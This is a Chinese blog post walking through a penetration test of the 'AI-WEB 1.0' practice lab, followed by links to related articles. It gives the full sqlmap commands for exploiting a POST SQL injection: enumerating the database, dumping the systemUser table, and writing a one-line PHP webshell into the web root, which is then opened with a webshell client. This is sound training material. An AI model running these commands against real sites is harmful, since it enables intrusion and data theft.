ai web渗透测试

于 2024-08-19 18:41:44 发布
阅读量265 收藏 4
点赞数 1
文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_45079558/article/details/141329036
版权

1,使用御剑2014端口扫描工具进行扫描

最后通过不断的尝试,发现目标靶场ip为172.16.1.88

进入后如图

使用御剑无字典大小限制版扫描网站目录

获得一个链接,访问

发现robots.txt中有标明目录,我们再去尝试一一访问。

http://172.16.1.88/m3diNf0/

http://172.16.1.88/se3reTdir777/

我们碰巧发现了有输入框的页面,假如这次没发现这个页面,可以继续用御剑扫描各级目录的文件

现在尝试注入

输入1正常

输入1‘报错

可以得出它是post传参的方式,首先用bp抓包,然后设置注入点

在kili的终端输入sqlmap -r '/home/kali/Desktop/1.txt' --current-dbc查看当前数据库。库名:aiweb1

通过sqlmap -r '/home/kali/Desktop/1.txt' --batch -D aiweb1 --tables查表。表名:user、systemUser

通过sqlmap -r '/home/kali/Desktop/1.txt' --batch -D aiweb1 -T systemUser --dump查systemUser数据

进行写入文件前需要直到网站根目录,所以再次通过御剑扫描网站目录得到

由访问http://172.16.1.88/m3diNf0/info.php得文件所处路径/home/www/html/web1x443290o2sdf92213/m3diNf0/info.php

通过sqlmap -r '/home/kali/Desktop/1.txt' --file-write '/home/kali/Desktop/2.txt' --file-dest /home/www/html/web1x443290o2sdf92213/m3diNf0/uploads/zzy.php上传一句话木马

在用菜刀连接工具连接。
 

亚历山大——纯真丁一郎
关注
  • 1
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
人工智能如何影响 IT 安全渗透测试的未来
qq_34657922的博客
03-23 827
很明显,渗透测试服务的未来将坚定不移地坚持人工智能,让测试结果更加准确和高效。借助 AI 驱动的工具,渗透测试人员可以直接专注于开发周期本身,并在另一端获得最大的安全性。然而,令人震惊的统计数据中的漏洞正在增加,如果不及时修补,可能会对企业造成严重后果。当设计不佳的 Web 应用程序、未打补丁的网络环境、可利用的密码、复杂的威胁以及更多的威胁出现在安全眼前时,让我们看看 AI 将如何应对未来的这些挑战。
人工智能渗透测试分析系列AI机器学习
02-26
第一部分主要介绍常见机器学习算法,简单模型、以及机器学习如何分析Web异常流量,并把机器学习结合...另外团队分析常见渗透测试工具中,常用的机器学习模型,最后学习所用,把机器算法结合到安全自动化红鹰安全工具。
AI该如何运用于Web渗透测试
Ms08067安全实验室
04-08 189
点击星标,即时接收最新推文AI+网络安全案例:AI助力GitHub工具回溯国内行业内首个AI+安全培训班,AI时代还在苦苦学习不如让AI为你打工。AI+安全=捷径让AI打工=薅公司羊毛AI=下一个安全趋势本期AI特色AI助力-BypassAI助力-密码学入门AI助力-情报收集与分析AI在应急响应下的使用场景内部圆桌课堂:共话AI+安全课程特点(1)零基础导入体系:0基础学习Web渗透,从0到1,理...
2022 年渗透测试趋势
热门推荐
baidu_31295661的博客
02-28 1万+
随着 2022 年的开始,现在是评估当前塑造渗透测试未来的技术趋势以及它将如何继续向前发展的最佳时机 由于大流行向远程工作过渡,2022 年也被认为是新挑战和转型的一年。对基于软件的属性(如 Web 和移动应用程序)的安全性需求不断增长,预计将促进全球渗透测试市场的增长。此外,基于云的安全服务的日益增长的使用预计将推动对渗透测试的需求。此外,预计发展中国家不断增长的数字化将推动基于物联网的连接设备的趋势。这反过来又增加了对渗透测试的需求。公司变得更容易受到恶意攻击和攻击。网络攻击的数量不断增加,加上满
AI WEB 1.0靶场渗透思路
weixin_69010236的博客
07-25 520
12.跑出了两个表的名称,但是表内没有我们想要的数据,因为我们目录扫描的时候,没有扫描出后台的登录页面,所以说获取到账号密码也是没有用的,我们可以想到之前我们获取到了一个phpinfo的页面,存在路径,我们就去尝试获取shell。3.我们可以看到扫出两个目录,我们去访问一下,第一个/index.html什么都没有,我们访问第二个/robots.txt,可以发现/robots.txt下面显示还有目录,我们接着去访问。7.我们发现是一个phpinfo的网页,但是我们可以获取到有用的信息,比如IP地址和路径。
web登录通杀渗透测试
wuli1024的博客
02-16 817
渗透测试过程中,碰见的web登录页面特别多,那么我们应该用什么样的思路去进行一个测试呢,下面看看我的一些测试师思路ba当看见一个这样的web登录框时,会怎么样进行一个渗透呢我们可以看见 这个登录时并没有存在一个验证码,就会存在一个爆破问题 那么一般爆破的用户名又会存在那些呢1.admin2.test3.root这里也可以去查找对应系统的的操作手测,收集管理账号,增加爆破机率在这里进行了爆破,并没有结果我们可以去扫描目录 可能一些被扫描出来的目录未做鉴权 可直接访问。
小白入坑 Web 渗透测试必备指南
YunWisdom
06-27 1265
小白如何快速入门 由于本人技术性受限制,可能部分内容显得不那么清晰,如有疑问请读者圈联系我。再者,内容不会完全讲清楚,因为本身话题的原因,部分会一笔带过。 小白该如何踏入 Web 安全这个坑呢?我的经历是,兴趣所在。我是野路子,全靠兴趣来自学。 现 Web 安全如果要讲入门,要求并不高,两三天就能入门,而我也仅在入门级别。 我接触这个比较早,最初是在10年还是09年来接触到一份网传 Web ...
使用 Kali Linux 进行 Web 渗透测试
Spontaneous_0的博客
12-21 1588
Web渗透:如何使用 Kali Linux 来访问目标 PC!什么是 Kali Linux?“Kali Linux 是一个基于 Debian 的 Linux 发行版,旨在进行高级渗透测试安全审核”。在Web渗透中,信息就是力量、就是安全。因此,我们总是首先收集尽可能多的有关目标的信息——因为这可能会告诉我们实施攻击的最佳方式。一台计算机(同一IP)上可以安装多个网站。如果您无法进入目标,请尝试侵入另一个网站。
实战项目之AIWEB2靶场渗透
胖虎的博客
11-05 1361
AIweb2靶场渗透测试
Web渗透测试初探
人生不怕起点低,就怕没追求
06-26 908
为了确保数据的安全、用户的隐私和在线服务的可靠性,我们必须主动识别和缓解 Web 应用程序中的漏洞。这就是专业的 Web 应用渗透测试服务发挥作用的地方。这些服务旨在加强 Web 应用的防御能力,领先一步应对潜在的网络威胁。
基于Python的渗透测试工具设计系统(django).zip
07-06
基于Python的渗透测试工具设计系统(django) web端口测试;渗透测试;python;django;mysql; 所以本次通过以B/S结构搭建一款能够渗透检测工具,通过该工具的开发来进行web网页漏洞、web端口扫描的技术实现,通过...
Python毕业设计-基于Django的多功能Web安全渗透测试系统的设计与实现+使用说明+全部资料(优秀项目).zip
04-16
Python毕业设计-基于Django的多功能Web安全渗透测试工具,包含漏洞扫描,端口扫描,指纹识别,目录扫描,旁站扫描,域名扫描等功能。的设计与实现+使用说明+全部资料(优秀项目).zip 【备注】 1、该资源内项目代码...
毕设&课设&项目&实基于Python-Django的多功能Web安全渗透测试工具,包含漏洞扫描,端口扫描.zip
02-03
包含前端、后端、移动开发、操作系统、人工智能、物联网、信息化管理、数据库、硬件开发、大数据、课程资源、音视频、网站开发等各种技术项目的源码。 包括STM32、ESP8266、PHP、QT、Linux、iOS、C++、Java、python...
特洛伊木马:现代网络安全的隐形威胁
最新发布
weixin_48579910的博客
08-16 565
特洛伊木马是一种伪装成合法软件或文件的恶意程序。攻击者利用这种伪装,使受害者在不知情的情况下主动安装或运行木马,从而为攻击者打开了进入目标系统的大门。与病毒不同,木马并不会自我复制,而是通过社会工程学等手段诱使用户下载和执行。特洛伊木马虽然是网络世界中的“老兵”,但其隐蔽性和多样性使得它至今仍然是网络安全的一大威胁。了解木马的工作原理和危害,并采取适当的防范措施,可以帮助我们在数字化生活中更加安全地航行。
漏洞扫描的重要性,如何做好漏洞扫描服务
dexunyun的博客
08-15 842
总之,系统漏洞扫描是守护网络安全的重要防线之一。通过漏洞扫描VSS,丰富的漏洞规则库,可针对各种类型的网站进行全面深入的漏洞扫描,提供专业全面的扫描报告。德迅云安全可以提供有效应对网络安全威胁的解决方案,为用户网络安全提供安全保障。
GPS叉车安全管理系统,远程监控管理车辆,保障叉车资产安全
jiuxindianzi的博客
08-16 459
九盾叉车监管系统利用GPS技术实现叉车全面监管,含IC卡指纹认证、无线实时测速、安全带报警器及小程序后台管理,提升安全性、效率及管理水平,降低运营成本。
AI安全-文生图
深度安全实验室
08-15 304
AI安全-文生图
安全工具推荐-Search_Viewer资产测绘】
qq_55213436的博客
08-14 244
Search_Viewer,集Fofa、Hunter鹰图、Shodan、360 quake、Zoomeye 钟馗之眼、censys 为一体的空间测绘gui图形界面化工具,支持一键采集爬取和导出fofa、shodan等数据,方便快捷查看。包含语法帮助手册,忘记查询语法也能方便查看语法,渗透不二之选。
web渗透测试在国外发展趋势跟上面不一样
06-12
2. 人工智能和机器学习:随着人工智能和机器学习技术的发展,Web渗透测试也将会更加智能化和自动化。例如,一些公司已经开始使用机器学习算法来分析测试结果和漏洞信息,提高测试效率和准确性。 3. DevSecOps:...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值